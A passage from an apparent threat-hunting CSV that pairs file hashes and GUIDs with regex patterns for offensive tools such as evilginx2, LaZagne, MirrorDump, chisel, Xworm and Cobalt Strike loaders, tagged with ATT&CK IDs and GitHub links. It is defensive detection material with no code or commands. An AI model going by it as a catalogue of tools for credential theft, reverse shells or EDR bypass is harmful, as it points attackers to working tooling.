credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*57dbbf5283ae35badf6a08c683f767a44c9efdde9623c0fa6429d8672c97a18e*",".{0,1000}57dbbf5283ae35badf6a08c683f767a44c9efdde9623c0fa6429d8672c97a18e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*57f5a53203d19daa9bb094b442bc029a374686af5be71741e5536e35590e9f9c*",".{0,1000}57f5a53203d19daa9bb094b442bc029a374686af5be71741e5536e35590e9f9c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5822804140e537314665856c9453da3cd786ff9383997e2b9b5d313d32efa0d7*",".{0,1000}5822804140e537314665856c9453da3cd786ff9383997e2b9b5d313d32efa0d7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*582524e066107d16e7e3c95046112a8511167405fdf6e8f92f8352d3653e61c4*",".{0,1000}582524e066107d16e7e3c95046112a8511167405fdf6e8f92f8352d3653e61c4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*58338E42-6010-493C-B8C8-2FD2CFC30FFB*",".{0,1000}58338E42\-6010\-493C\-B8C8\-2FD2CFC30FFB.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee*",".{0,1000}58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*5859e420b588764f0d8d5e301439af524ef486d1d39b0a189d93546cacf51d7d*",".{0,1000}5859e420b588764f0d8d5e301439af524ef486d1d39b0a189d93546cacf51d7d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5863244576fb755560b02f19192a13ce331de82e3fcea5b60509966da90239b5*",".{0,1000}5863244576fb755560b02f19192a13ce331de82e3fcea5b60509966da90239b5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5872afc30ecad98baad85351941c0f0d573fed08d224d038138b7dac77ba6ea1*",".{0,1000}5872afc30ecad98baad85351941c0f0d573fed08d224d038138b7dac77ba6ea1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*588ab29a14df0313167d12053095f2959f0f7e28206a60f3e5c86cc939c0d89b*",".{0,1000}588ab29a14df0313167d12053095f2959f0f7e28206a60f3e5c86cc939c0d89b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*58B32FCA-F385-4500-9A8E-7CBA1FC9BA13*",".{0,1000}58B32FCA\-F385\-4500\-9A8E\-7CBA1FC9BA13.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*58cd6577c12f1c12a51e8abbe80aa54cd358e7c65a4efa8f28425d98ff0278cc*",".{0,1000}58cd6577c12f1c12a51e8abbe80aa54cd358e7c65a4efa8f28425d98ff0278cc.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*58d82bca11a41a01d0ddfa7d105e6a48*",".{0,1000}58d82bca11a41a01d0ddfa7d105e6a48.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*5900fc96f25ad0d41cbed1bb7b0f38bde26e0ebebc290f1a294ffedeb1d68b83*",".{0,1000}5900fc96f25ad0d41cbed1bb7b0f38bde26e0ebebc290f1a294ffedeb1d68b83.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*590e6b85b7ae5a1572103332c6cc9494a13c65d33e839b3316704fe79c998f65*",".{0,1000}590e6b85b7ae5a1572103332c6cc9494a13c65d33e839b3316704fe79c998f65.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*59224C16-39C5-49EA-8525-F493DC1D66FE*",".{0,1000}59224C16\-39C5\-49EA\-8525\-F493DC1D66FE.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*595D5812-AA30-4EDE-95DA-8EDD7B8844BD*",".{0,1000}595D5812\-AA30\-4EDE\-95DA\-8EDD7B8844BD.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*596f3d75d96f68ee6e91c6c5ec4180b6277b6f067e6fe233193c2f75dc554e8b*",".{0,1000}596f3d75d96f68ee6e91c6c5ec4180b6277b6f067e6fe233193c2f75dc554e8b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*597f9482c4e355cb665fbd02bde2b59133e1a364744cbb41207c68e1bd7fe3c6*",".{0,1000}597f9482c4e355cb665fbd02bde2b59133e1a364744cbb41207c68e1bd7fe3c6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1*",".{0,1000}59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*59aa09cb628399ea3c2a900cb391238cea0bbe9083868f9fcfa4c13dcbf0b702*",".{0,1000}59aa09cb628399ea3c2a900cb391238cea0bbe9083868f9fcfa4c13dcbf0b702.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*59ffd99e0fe7d354d185bacf11949be89fa86a88f40ac4773f33e784279b31cd*",".{0,1000}59ffd99e0fe7d354d185bacf11949be89fa86a88f40ac4773f33e784279b31cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5A0FBE0D-BACC-4B97-8578-B5B27567EEA7*",".{0,1000}5A0FBE0D\-BACC\-4B97\-8578\-B5B27567EEA7.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*5a145c3bcbe90fdd067206d68009d5ba36f8d0bea8f1d6bcbf0a0f05005edf38*",".{0,1000}5a145c3bcbe90fdd067206d68009d5ba36f8d0bea8f1d6bcbf0a0f05005edf38.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5a1f9b0e-9f7c-4673-bf16-4740707f41b7*",".{0,1000}5a1f9b0e\-9f7c\-4673\-bf16\-4740707f41b7.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*5a2845a19dc310535eec5c74dd770db258e90160ea63e5cc9d97ab87de8081ff*",".{0,1000}5a2845a19dc310535eec5c74dd770db258e90160ea63e5cc9d97ab87de8081ff.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5a2e947aace9e081ecd2cfa7bc2e485528238555c7eeb6bcca560576d4750a50*",".{0,1000}5a2e947aace9e081ecd2cfa7bc2e485528238555c7eeb6bcca560576d4750a50.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*5a3ae8d1bf88a4415c293623ca868e718bf2addbfc88953267bed9c9cf57c2ad*",".{0,1000}5a3ae8d1bf88a4415c293623ca868e718bf2addbfc88953267bed9c9cf57c2ad.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5A403F3C-9136-4B67-A94E-02D3BCD3162D*",".{0,1000}5A403F3C\-9136\-4B67\-A94E\-02D3BCD3162D.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b*",".{0,1000}5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*5a56d5caa6847d283e27207b727ce27a852b8a567cacd7b29f6073a1458e494e*",".{0,1000}5a56d5caa6847d283e27207b727ce27a852b8a567cacd7b29f6073a1458e494e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5a57366f655b5bf5b500769847d1b055d3847065703803d509ff2fa83837ff3a*",".{0,1000}5a57366f655b5bf5b500769847d1b055d3847065703803d509ff2fa83837ff3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5A6F942E-888A-4CE1-A6FB-1AB8AE22AFFA*",".{0,1000}5A6F942E\-888A\-4CE1\-A6FB\-1AB8AE22AFFA.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","0","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*5a89f9df7621ef8eac8832f7397c55559d71cee04a798474683e7e0019f5ee49*",".{0,1000}5a89f9df7621ef8eac8832f7397c55559d71cee04a798474683e7e0019f5ee49.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5a9924bf1bd43eaa25685fa21d111909aeab2952b8c7eb67aad1b2ec43b4054c*",".{0,1000}5a9924bf1bd43eaa25685fa21d111909aeab2952b8c7eb67aad1b2ec43b4054c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5A9955E4-62B7-419D-AB73-01A6D7DD27FC*",".{0,1000}5A9955E4\-62B7\-419D\-AB73\-01A6D7DD27FC.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*5AC309CE-1223-4FF5-AF84-24BCD0B9E4DC*",".{0,1000}5AC309CE\-1223\-4FF5\-AF84\-24BCD0B9E4DC.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*5ae17ceeb8dcfb5eb56fc27876c5047ddfebcb9114beb0a03db81000c46d7054*",".{0,1000}5ae17ceeb8dcfb5eb56fc27876c5047ddfebcb9114beb0a03db81000c46d7054.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*5ae9e28dda38df5a339e0f02d4b318e9e6e48a9abe916bb4161a80c7eac0da1f*",".{0,1000}5ae9e28dda38df5a339e0f02d4b318e9e6e48a9abe916bb4161a80c7eac0da1f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*5afab0c6f13f93b77c833816fd067007f9a0770ff0ce5096b55635fa3d9b96b4*",".{0,1000}5afab0c6f13f93b77c833816fd067007f9a0770ff0ce5096b55635fa3d9b96b4.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","N/A","N/A","N/A","N/A","N/A" "*5b1ce3529f7881a1252086a73bdbb45d6e9debb50f92b9c42fad341e34146437*",".{0,1000}5b1ce3529f7881a1252086a73bdbb45d6e9debb50f92b9c42fad341e34146437.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*5b32dad4ad2b350157eda3061dc821645e7cd291970509ab32e9023b8c945951*",".{0,1000}5b32dad4ad2b350157eda3061dc821645e7cd291970509ab32e9023b8c945951.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*5b4300844bcd004ff1d5415a81dde48c9b3505338e8ff1b8bdaeb5f89c415b46*",".{0,1000}5b4300844bcd004ff1d5415a81dde48c9b3505338e8ff1b8bdaeb5f89c415b46.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*5b46050219c918b47dc271a458450d384c4691f9ff96d174856946ff3fadffa9*",".{0,1000}5b46050219c918b47dc271a458450d384c4691f9ff96d174856946ff3fadffa9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 